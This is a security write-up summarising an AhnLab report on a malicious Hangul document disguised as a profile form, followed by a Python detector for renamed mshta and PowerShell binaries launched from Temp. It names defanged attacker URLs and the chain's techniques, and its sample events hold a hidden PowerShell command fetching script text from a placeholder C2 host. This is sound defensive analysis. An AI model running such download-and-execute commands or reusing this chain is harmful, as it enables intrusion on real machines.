Hangul Document Disguised as a Profile Form (OLE Object)

2022-08-29, AhnLab: Hangul document disguised as a profile form (OLE object)

https://asec.ahnlab.com/ko/38216/


A malicious Hangul (HWP) document disguised as a profile or personal-information form used embedded OLE objects and hidden hyperlinks to launch Windows binaries that had been copied into the Temp directory. Clicking the form fields executed a local LNK file, which ran a renamed mshta binary against hxxp://yukkimmo.sportsontheweb[.]net/hw.php, enabling attacker-controlled command execution. Further observed commands used a renamed PowerShell binary to download and execute script content from hxxp://yukkimmo.sportsontheweb[.]net/h.txt. That script downloaded PE data, hollowed System32\cmd.exe, tracked recent HWP link filenames, and replaced the opened document with another HWP that could carry a Flash object exploiting CVE-2018-15982. The report matters because it shows an older HWP Flash exploit chain being reused together with OLE, LNK, mshta, PowerShell, and document-replacement techniques that can support further attacker commands.
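As an added detection example (not code from the AhnLab report), the following Python flags process-creation events that match the chain above: a copy of mshta or PowerShell running under a different file name, from a Temp directory, with a remote URL on its command line. It assumes Sysmon Event ID 1 style field names (Image, OriginalFileName, CommandLine); the sample events are constructed, not real telemetry.

```python
import re
from pathlib import PureWindowsPath

# Binaries the chain copies out of System32 and runs under a new name (per the report).
ABUSED_ORIGINAL_NAMES = {"mshta.exe", "powershell.exe"}
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def classify(event: dict) -> list[str]:
    """Return the reasons a process-creation event matches the chain; [] means no match."""
    image = event.get("Image", "")
    name = PureWindowsPath(image).name.lower()
    # OriginalFileName comes from PE version info, so it survives renaming on disk.
    original = event.get("OriginalFileName", "").lower()
    cmdline = event.get("CommandLine", "")
    reasons = []
    if original not in ABUSED_ORIGINAL_NAMES:
        return reasons  # only the mshta / PowerShell lineage is of interest here
    if name != original:
        reasons.append(f"{original} running under the name {name}")
    if any(marker in image.lower() for marker in TEMP_MARKERS):
        reasons.append("copy executing from a Temp directory")
    if URL_RE.search(cmdline):
        reasons.append("remote URL on the command line")
    return reasons


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map the index of each suspicious event to the reasons it was flagged."""
    return {i: r for i, e in enumerate(events) if (r := classify(e))}


# Constructed sample events (not real telemetry); the URL host is a placeholder.
SAMPLE_EVENTS = [
    {   # renamed mshta copy in Temp fetching the first stage, as the report describes
        "Image": r"C:\Users\user\AppData\Local\Temp\hta.exe",
        "OriginalFileName": "MSHTA.EXE",
        "CommandLine": r"C:\Users\user\AppData\Local\Temp\hta.exe http://c2.example.invalid/hw.php"},
    {   # renamed PowerShell copy pulling script text
        "Image": r"C:\Users\user\AppData\Local\Temp\ps.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": r"ps.exe -w hidden -c (iwr http://c2.example.invalid/h.txt).Content"},
    {   # legitimate mshta from System32 running a local .hta: no signal
        "Image": r"C:\Windows\System32\mshta.exe",
        "OriginalFileName": "MSHTA.EXE",
        "CommandLine": r"mshta.exe C:\tools\panel.hta"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe"},  # unrelated process
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"], "->", "; ".join(reasons))
```

Any single reason is worth an alert on its own; all three together are the exact pattern the report describes.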

Indicators of Compromise

